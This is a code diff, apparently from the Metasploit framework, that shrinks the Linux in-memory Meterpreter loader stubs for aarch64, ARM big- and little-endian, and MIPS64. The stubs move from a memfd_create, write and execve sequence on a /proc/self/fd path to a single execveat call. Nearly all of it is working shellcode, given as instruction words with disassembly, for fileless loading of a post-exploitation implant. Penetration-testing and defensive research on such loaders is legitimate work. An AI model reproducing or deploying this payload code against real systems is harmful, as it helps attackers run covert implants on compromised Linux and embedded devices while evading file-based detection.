Uses execveat syscall to make loader stub smaller

Author: msutovsky-r7

lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb

@@ -7,56 +7,32 @@
 module Msf::Payload::Linux::Aarch64::MeterpreterLoader
   def in_memory_load(payload)
       in_memory_loader = [
-      
-      #memfd_create(null, MFD_CLOEXEC);
-      0x0a0080d2, # 0x1000:	mov	x10, #0	0x0a0080d2
-      0xea0300f9, # 0x1004:	str	x10, [sp]	0xea0300f9
-      0xe0030091, # 0x1008:	mov	x0, sp	0xe0030091
-      0x210080d2, # 0x100c:	mov	x1, #1	0x210080d2
-      0xe82280d2, # 0x1010:	mov	x8, #0x117	0xe82280d2
-      0x010000d4, # 0x1014:	svc	#0	0x010000d4
-
-      #use branching and branching with link to reliably get address of payload data
-      0xe90300aa, # 0x1018:	mov	x9, x0	0xe90300aa
-      0x1f000014, # 0x101c:	b	#0x1098	0x1f000014
-      0xea031eaa, # 0x1020:	mov	x10, x30	0xea031eaa
-      
-      #write(fd,payload_addr, payload_size)
-      0x420140b9, # 0x1024:	ldr	w2, [x10]	0x420140b9
-      0x4a890091, # 0x1028:	add	x10, x10, #0x22	0x4a890091
-      0xe1030aaa, # 0x102c:	mov	x1, x10	0xe1030aaa
-      0x080880d2, # 0x1030:	mov	x8, #0x40	0x080880d2
-      0x010000d4, # 0x1034:	svc	#0	0x010000d4
-      
-      #convert fd using itoa and append it to /proc/self/fd/ 
-      0x4b0180d2, # 0x1038:	mov	x11, #0xa	0x4b0180d2
-      0x4a0900d1, # 0x103c:	sub	x10, x10, #2	0x4a0900d1
-      0x2c09cb9a, # 0x1040:	udiv	x12, x9, x11	0x2c09cb9a
-      0x8d7d0b9b, # 0x1044:	mul	x13, x12, x11	0x8d7d0b9b
-      0x2d010dcb, # 0x1048:	sub	x13, x9, x13	0x2d010dcb
-      0xe9030caa, # 0x104c:	mov	x9, x12	0xe9030caa
-      0xadc10091, # 0x1050:	add	x13, x13, #0x30	0xadc10091
-      0x4d010039, # 0x1054:	strb	w13, [x10]	0x4d010039
-      0x4a0500d1, # 0x1058:	sub	x10, x10, #1	0x4a0500d1
-      0x3f0100f1, # 0x105c:	cmp	x9, #0	0x3f0100f1
-      0x01ffff54, # 0x1060:	b.ne	#0x1040	0x01ffff54
-      0xe90580d2, # 0x1064:	mov	x9, #0x2f	0xe90580d2
-      0x4b014039, # 0x1068:	ldrb	w11, [x10]	0x4b014039
-      0x7f0109eb, # 0x106c:	cmp	x11, x9	0x7f0109eb
-      0x80000054, # 0x1070:	b.eq	#0x1080	0x80000054
-      0x49010039, # 0x1074:	strb	w9, [x10]	0x49010039
-      0x4a0500d1, # 0x1078:	sub	x10, x10, #1	0x4a0500d1
-      0xfaffff17, # 0x107c:	b	#0x1064	0xfaffff17
-      0x4a3500d1, # 0x1080:	sub	x10, x10, #0xd	0x4a3500d1
-      #execve(/proc/self/fd/[fd],0,0)
-      0xe0030aaa, # 0x1084:	mov	x0, x10	0xe0030aaa
-      0x010080d2, # 0x1088:	mov	x1, #0	0x010080d2
-      0x020080d2, # 0x108c:	mov	x2, #0	0x020080d2
-      0xa81b80d2, # 0x1090:	mov	x8, #0xdd	0xa81b80d2
-      0x010000d4, # 0x1094:	svc	#0	0x010000d4
-      0xe2ffff97, # 0x1098:	bl	#0x1020	0xe2ffff97,
-    ].pack('N*')
-      fd_path = '/proc/self/fd/'.bytes.pack('c*') + "\x00" * 16
-      in_memory_loader + [payload.length].pack("V*") + fd_path
+          0x0a0080d2, #0x1000:	mov	x10, #0	0x0a0080d2
+          0xea0300f9, #0x1004:	str	x10, [sp]	0xea0300f9
+          0xe0030091, #0x1008:	mov	x0, sp	0xe0030091
+          0x210080d2, #0x100c:	mov	x1, #1	0x210080d2
+          0xe82280d2, #0x1010:	mov	x8, #0x117	0xe82280d2
+          0x010000d4, #0x1014:	svc	#0	0x010000d4
+          0xe90300aa, #0x1018:	mov	x9, x0	0xe90300aa
+          0x10000014, #0x101c:	b	#0x105c	0x10000014
+          0xea031eaa, #0x1020:	mov	x10, x30	0xea031eaa
+          0x420140b9, #0x1024:	ldr	w2, [x10]	0x420140b9
+          0x4a110091, #0x1028:	add	x10, x10, #4	0x4a110091
+          0xe1030aaa, #0x102c:	mov	x1, x10	0xe1030aaa
+          0x080880d2, #0x1030:	mov	x8, #0x40	0x080880d2
+          0x010000d4, #0x1034:	svc	#0	0x010000d4
+          0xe00309aa, #0x1038:	mov	x0, x9	0xe00309aa
+          0x0a0080d2, #0x103c:	mov	x10, #0	0x0a0080d2
+          0xea0300f9, #0x1040:	str	x10, [sp]	0xea0300f9
+          0xe1030091, #0x1044:	mov	x1, sp	0xe1030091
+          0x020080d2, #0x1048:	mov	x2, #0	0x020080d2
+          0x030080d2, #0x104c:	mov	x3, #0	0x030080d2
+          0x040082d2, #0x1050:	mov	x4, #0x1000	0x040082d2
+          0x282380d2, #0x1054:	mov	x8, #0x119	0x282380d2
+          0x010000d4, #0x1058:	svc	#0	0x010000d4
+          0xf1ffff97, #0x105c:	bl	#0x1020	0xf1ffff97
+      ]
+.pack('N*')
+      in_memory_loader + [payload.length].pack("V*")
   end
 end

lib/msf/core/payload/linux/armbe/meterpreter_loader.rb

@@ -8,58 +8,31 @@
 module Msf::Payload::Linux::Armbe::MeterpreterLoader
   def in_memory_load(payload)
       in_memory_loader = [
-      #memfd_create(null, MFD_CLOEXEC)
-      0x0020a0e3, # 0x1000:	mov	r2, #0	0x0020a0e3
-      0x04202de5, # 0x1004:	str	r2, [sp, #-4]!	0x04202de5
-      0x0d00a0e1, # 0x1008:	mov	r0, sp	0x0d00a0e1
-      0x0110a0e3, # 0x100c:	mov	r1, #1	0x0110a0e3
-      0x8370a0e3, # 0x1010:	mov	r7, #0x83	0x8370a0e3
-      0xfe7087e2, # 0x1014:	add	r7, r7, #0xfe	0xfe7087e2
-      0x000000ef, # 0x1018:	svc	#0	0x000000ef
-      
-      #save fd to r3    
-      0x0030a0e1, # 0x101c:	mov	r3, r0	0x0030a0e1
-      
-      #use branch and branch with linking to get address of payload data
-      0x1d0000ea, # 0x1020:	b	#0x109c	0x1d0000ea
-      0x0e10a0e1, # 0x1024:	mov	r1, lr	0x0e10a0e1
-      
-      #write(fd,payload, payload_length)
-      0x002091e5, # 0x1028:	ldr	r2, [r1]	0x002091e5
-      0x261081e2, # 0x102c:	add	r1, r1, #0x26	0x261081e2
-      0x0470a0e3, # 0x1030:	mov	r7, #4	0x0470a0e3
-      0x000000ef, # 0x1034:	svc	#0	0x000000ef
-      
-      #use custom itoa to convert fd into string and append it to /proc/self/fd/
-      0x021041e2, # 0x1038:	sub	r1, r1, #2	0x021041e2
-      0x01a0a0e1, # 0x103c:	mov	sl, r1	0x01a0a0e1
-      0x0a20a0e3, # 0x1040:	mov	r2, #0xa	0x0a20a0e3
-      0x13f234e7, # 0x1044:	udiv	r4, r3, r2	0x13f234e7
-      0x940205e0, # 0x1048:	mul	r5, r4, r2	0x940205e0
-      0x055043e0, # 0x104c:	sub	r5, r3, r5	0x055043e0
-      0x0430a0e1, # 0x1050:	mov	r3, r4	0x0430a0e1
-      0x305085e2, # 0x1054:	add	r5, r5, #0x30	0x305085e2
-      0x0050cae5, # 0x1058:	strb	r5, [sl]	0x0050cae5
-      0x01a04ae2, # 0x105c:	sub	sl, sl, #1	0x01a04ae2
-      0x000054e3, # 0x1060:	cmp	r4, #0	0x000054e3
-      0xf6ffff1a, # 0x1064:	bne	#0x1044	0xf6ffff1a
-      0x2f90a0e3, # 0x1068:	mov	sb, #0x2f	0x2f90a0e3
-      0x00b0dae5, # 0x106c:	ldrb	fp, [sl]	0x00b0dae5
-      0x09005be1, # 0x1070:	cmp	fp, sb	0x09005be1
-      0x0200000a, # 0x1074:	beq	#0x1084	0x0200000a
-      0x0090cae5, # 0x1078:	strb	sb, [sl]	0x0090cae5
-      0x01a04ae2, # 0x107c:	sub	sl, sl, #1	0x01a04ae2
-      0xf9ffffea, # 0x1080:	b	#0x106c	0xf9ffffea
-      0x0da04ae2, # 0x1084:	sub	sl, sl, #0xd	0x0da04ae2
-      #execve(/proc/self/fd/[fd],0,0) 
-      0x0a00a0e1, # 0x1088:	mov	r0, sl	0x0a00a0e1
-      0x0010a0e3, # 0x108c:	mov	r1, #0	0x0010a0e3
-      0x0020a0e3, # 0x1090:	mov	r2, #0	0x0020a0e3
-      0x0b70a0e3, # 0x1094:	mov	r7, #0xb	0x0b70a0e3
-      0x000000ef, # 0x1098:	svc	#0	0x000000ef
-      0xe0ffffeb, # 0x109c:	bl	#0x1024	0xe0ffffeb
-    ].pack('V*')
-    fd_path = '/proc/self/fd/'.bytes.pack('C*') + "\x00" * 16
-    in_memory_loader + [payload.length, 0x00000123].pack('N*') + fd_path
+          0x0020a0e3, #0x1000:	mov	r2, #0	0x0020a0e3
+          0x04202de5, #0x1004:	str	r2, [sp, #-4]!	0x04202de5
+          0x0d00a0e1, #0x1008:	mov	r0, sp	0x0d00a0e1
+          0x0110a0e3, #0x100c:	mov	r1, #1	0x0110a0e3
+          0x8370a0e3, #0x1010:	mov	r7, #0x83	0x8370a0e3
+          0xfe7087e2, #0x1014:	add	r7, r7, #0xfe	0xfe7087e2
+          0x000000ef, #0x1018:	svc	#0	0x000000ef
+          0x0030a0e1, #0x101c:	mov	r3, r0	0x0030a0e1
+          0x0c0000ea, #0x1020:	b	#0x1058	0x0c0000ea
+          0x0e10a0e1, #0x1024:	mov	r1, lr	0x0e10a0e1
+          0x002091e5, #0x1028:	ldr	r2, [r1]	0x002091e5
+          0x041081e2, #0x102c:	add	r1, r1, #4	0x041081e2
+          0x0470a0e3, #0x1030:	mov	r7, #4	0x0470a0e3
+          0x000000ef, #0x1034:	svc	#0	0x000000ef
+          0x0300a0e1, #0x1038:	mov	r0, r3	0x0300a0e1
+          0x0020a0e3, #0x103c:	mov	r2, #0	0x0020a0e3
+          0x04202de5, #0x1040:	str	r2, [sp, #-4]!	0x04202de5
+          0x0d10a0e1, #0x1044:	mov	r1, sp	0x0d10a0e1
+          0x0030a0e3, #0x1048:	mov	r3, #0	0x0030a0e3
+          0x014aa0e3, #0x104c:	mov	r4, #0x1000	0x014aa0e3
+          0x837100e3, #0x1050:	movw	r7, #0x183	0x837100e3
+          0x000000ef, #0x1054:	svc	#0	0x000000ef
+          0xf1ffffeb, #0x1058:	bl	#0x1024	0xf1ffffeb
+
+      ].pack('V*')
+      in_memory_loader + [payload.length].pack('N*')
   end
 end

lib/msf/core/payload/linux/armle/meterpreter_loader.rb

@@ -7,61 +7,31 @@
 module Msf::Payload::Linux::Armle::MeterpreterLoader
   def in_memory_load(payload)
         in_memory_loader = [
-
-            #memfd_create(null, MFD_CLOEXEC)
-0xe3a02000, #0x1000:	mov	r2, #0	0xe3a02000
-0xe52d2004, #0x1004:	str	r2, [sp, #-4]!	0xe52d2004
-0xe1a0000d, #0x1008:	mov	r0, sp	0xe1a0000d
-0xe3a01001, #0x100c:	mov	r1, #1	0xe3a01001
-0xe3a07083, #0x1010:	mov	r7, #0x83	0xe3a07083
-0xe28770fe, #0x1014:	add	r7, r7, #0xfe	0xe28770fe
-0xef000000, #0x1018:	svc	#0	0xef000000
-            #save fd to r3
-0xe1a03000, #0x101c:	mov	r3, r0	0xe1a03000
-
-#use branch and branch with linking to get address of payload data
-0xea00001d, #0x1020:	b	#0x109c	0xea00001d
-0xe1a0100e, #0x1024:	mov	r1, lr	0xe1a0100e
-
-#write(fd,payload, payload_length)
-0xe5912000, #0x1028:	ldr	r2, [r1]	0xe5912000
-0xe2811026, #0x102c:	add	r1, r1, #0x26	0xe2811026
-0xe3a07004, #0x1030:	mov	r7, #4	0xe3a07004
-0xef000000, #0x1034:	svc	#0	0xef000000
-
-#use custom itoa to convert fd into string and append it to /proc/self/fd/
-0xe2411002, #0x1038:	sub	r1, r1, #2	0xe2411002
-0xe1a0a001, #0x103c:	mov	sl, r1	0xe1a0a001
-0xe3a0200a, #0x1040:	mov	r2, #0xa	0xe3a0200a
-0xe734f213, #0x1044:	udiv	r4, r3, r2	0xe734f213
-0xe0050294, #0x1048:	mul	r5, r4, r2	0xe0050294
-0xe0435005, #0x104c:	sub	r5, r3, r5	0xe0435005
-0xe1a03004, #0x1050:	mov	r3, r4	0xe1a03004
-0xe2855030, #0x1054:	add	r5, r5, #0x30	0xe2855030
-0xe5ca5000, #0x1058:	strb	r5, [sl]	0xe5ca5000
-0xe24aa001, #0x105c:	sub	sl, sl, #1	0xe24aa001
-0xe3540000, #0x1060:	cmp	r4, #0	0xe3540000
-0x1afffff6, #0x1064:	bne	#0x1044	0x1afffff6
-0xe3a0902f, #0x1068:	mov	sb, #0x2f	0xe3a0902f
-0xe5dab000, #0x106c:	ldrb	fp, [sl]	0xe5dab000
-0xe15b0009, #0x1070:	cmp	fp, sb	0xe15b0009
-0x0a000002, #0x1074:	beq	#0x1084	0x0a000002
-0xe5ca9000, #0x1078:	strb	sb, [sl]	0xe5ca9000
-0xe24aa001, #0x107c:	sub	sl, sl, #1	0xe24aa001
-0xeafffff9, #0x1080:	b	#0x106c	0xeafffff9
-0xe24aa00d, #0x1084:	sub	sl, sl, #0xd	0xe24aa00d
-#execve(/proc/self/fd/[fd],0,0)
-0xe1a0000a, #0x1088:	mov	r0, sl	0xe1a0000a
-0xe3a01000, #0x108c:	mov	r1, #0	0xe3a01000
-0xe3a02000, #0x1090:	mov	r2, #0	0xe3a02000
-0xe3a0700b, #0x1094:	mov	r7, #0xb	0xe3a0700b
-0xef000000, #0x1098:	svc	#0	0xef000000
-0xebffffe0, #0x109c:	bl	#0x1024	0xebffffe0
-
-payload.length,
-      0x00000123 # .word
-    ].pack('V*')
-    fd_path = '/proc/self/fd/'.bytes.pack('C*') + "\x00" * 16
-    in_memory_loader + fd_path
+          0xe3a02000, #0x1000:	mov	r2, #0	0xe3a02000
+          0xe52d2004, #0x1004:	str	r2, [sp, #-4]!	0xe52d2004
+          0xe1a0000d, #0x1008:	mov	r0, sp	0xe1a0000d
+          0xe3a01001, #0x100c:	mov	r1, #1	0xe3a01001
+          0xe3a07083, #0x1010:	mov	r7, #0x83	0xe3a07083
+          0xe28770fe, #0x1014:	add	r7, r7, #0xfe	0xe28770fe
+          0xef000000, #0x1018:	svc	#0	0xef000000
+          0xe1a03000, #0x101c:	mov	r3, r0	0xe1a03000
+          0xea00000c, #0x1020:	b	#0x1058	0xea00000c
+          0xe1a0100e, #0x1024:	mov	r1, lr	0xe1a0100e
+          0xe5912000, #0x1028:	ldr	r2, [r1]	0xe5912000
+          0xe2811004, #0x102c:	add	r1, r1, #4	0xe2811004
+          0xe3a07004, #0x1030:	mov	r7, #4	0xe3a07004
+          0xef000000, #0x1034:	svc	#0	0xef000000
+          0xe1a00003, #0x1038:	mov	r0, r3	0xe1a00003
+          0xe3a02000, #0x103c:	mov	r2, #0	0xe3a02000
+          0xe52d2004, #0x1040:	str	r2, [sp, #-4]!	0xe52d2004
+          0xe1a0100d, #0x1044:	mov	r1, sp	0xe1a0100d
+          0xe3a03000, #0x1048:	mov	r3, #0	0xe3a03000
+          0xe3a04a01, #0x104c:	mov	r4, #0x1000	0xe3a04a01
+          0xe3007183, #0x1050:	movw	r7, #0x183	0xe3007183
+          0xef000000, #0x1054:	svc	#0	0xef000000
+          0xebfffff1, #0x1058:	bl	#0x1024	0xebfffff1
+          payload.length
+        ].pack('V*')
+        in_memory_loader 
   end
 end

lib/msf/core/payload/linux/mips64/meterpreter_loader.rb

@@ -10,56 +10,36 @@ def in_memory_load(payload)
     size_h = size >> 16
     size_l = size & 0x0000ffff
     in_memory_loader = [
-      0x00001025,               #   move    v0,zero
-      0x04510000,               #   bgezal  v0,8 <myself>
-      0x00000000,               #   nop
-      0x00000000,               #   nop
-      0x03e02025,               #   move    a0,ra
-      0x27ff00b8,               #   addiu   ra,ra,92
-      0x2419fffe,               #   li      t9,-2
-      0x03202827,               #   nor     a1,t9,zero
-      0x340214c2,               #   li      v0,0x14c2
-      0x0101010c,               #   syscall 0x40404
-      0x03e02825,               #   move    a1,ra
-      (0x3c06 << 16 | size_h),  #   lui     a2,0x17
-      (0x34c6 << 16 | size_l),  #   ori     a2,a2,0x2fb8
-      0x00402025,               #   move    a0,v0
-      0x0080c825,               #   move    t9,a0
-      0x34021389,               #   li      v0,0x1389
-      0x0101010c,               #   syscall 0x40404
-      0x27e7fffe,               #   addiu   a3,ra,-2
-      0x2418000a,               #   li      t8,10
-      0x24050016,               #   li      a1,23
-      0x13200011,               #   beqz    t9,98 <execve>
-      0x00000000,               #   bnez    t8,60 <itoa+0x10>
-      0x0338001a,               #   div     zero,t9,t8
-      0x00000000,               #   break   0x7
-      0x2401ffff,               #   li      at,-1
-      0x17010004,               #   bne     t8,at,78 <itoa+0x28>
-      0x3c018000,               #   lui     at,0x8000
-      0x17210002,               #   bne     t9,at,78 <itoa+0x28>
-      0x00000000,               #   nop
-      0x00000000,               #   break   0x6
-      0x0000c812,               #   mflo    t9
-      0x0000c812,               #   mflo    t9
-      0x00007810,               #   mfhi    t3
-      0x25ef0030,               #   addiu   t3,t3,48
-      0xa0ef0000,               #   sb      t3,0(a3)
-      0x24a5ffff,               #   addiu   a1,a1,-1
-      0x24e7ffff,               #   addiu   a3,a3,-1
-      0x1000ffee,               #   b       50 <itoa>
-      0x00e52022,               #   sub     a0,a3,a1
-      0x2805ffff,               #   slti    a1,zero,-1
-      0x2806ffff,               #   slti    a2,zero,-1
-      0x340213c1,               #   li      v0,0xfab
-      0x0101010c,               #   syscall 0x40404
-      0x2f70726f,               #   sltiu   s0,k1,29295
-      0x632f7365,               #   daddi   t3,t9,29541
-      0x6c662f66,               #   ldr     a2,12134(v1)
-      0x642f2f2f,               #   daddiu  t3,at,12079
-      0x2f2f2f2f,               #   sltiu   t3,t9,12079
-      0x2f2f2f00,               #   sltiu   t3,t9,12032
+
+0x04110000, #0x1000:	bal	0x1004	0x04110000
+0x00000000, #0x1004:	nop		0x00000000
+0x03e02025, #0x1008:	move	$a0, $ra	0x03e02025
+0x27ff005c, #0x100c:	addiu	$ra, $ra, 0x5c	0x27ff005c
+0x2419fffe, #0x1010:	addiu	$t9, $zero, -2	0x2419fffe
+0x03202827, #0x1014:	not	$a1, $t9	0x03202827
+0x240214c2, #0x1018:	addiu	$v0, $zero, 0x14c2	0x240214c2
+0x0101010c, #0x101c:	syscall	0x40404	0x0101010c
+0x03e02825, #0x1020:	move	$a1, $ra	0x03e02825
+0x3c060017, #0x1024:	lui	$a2, 0x17	0x3c060017
+0x34c62fb8, #0x1028:	ori	$a2, $a2, 0x2fb8	0x34c62fb8
+0x00402025, #0x102c:	move	$a0, $v0	0x00402025
+0x0080c825, #0x1030:	move	$t9, $a0	0x0080c825
+0x24021389, #0x1034:	addiu	$v0, $zero, 0x1389	0x24021389
+0x0101010c, #0x1038:	syscall	0x40404	0x0101010c
+0x03202025, #0x103c:	move	$a0, $t9	0x03202025
+0xafa0fffc, #0x1040:	sw	$zero, -4($sp)	0xafa0fffc
+0x27bdfffc, #0x1044:	addiu	$sp, $sp, -4	0x27bdfffc
+0x03a02820, #0x1048:	add	$a1, $sp, $zero	0x03a02820
+0x00003025, #0x104c:	move	$a2, $zero	0x00003025
+0x00003825, #0x1050:	move	$a3, $zero	0x00003825
+0x24191000, #0x1054:	addiu	$t9, $zero, 0x1000	0x24191000
+0xafb90010, #0x1058:	sw	$t9, 0x10($sp)	0xafb90010
+0x240214c4, #0x105c:	addiu	$v0, $zero, 0x14c4	0x240214c4
+0x0101010c, #0x1060:	syscall	0x40404	0x0101010c
+
+
+
     ].pack('N*')
     in_memory_loader
   end
-end
+end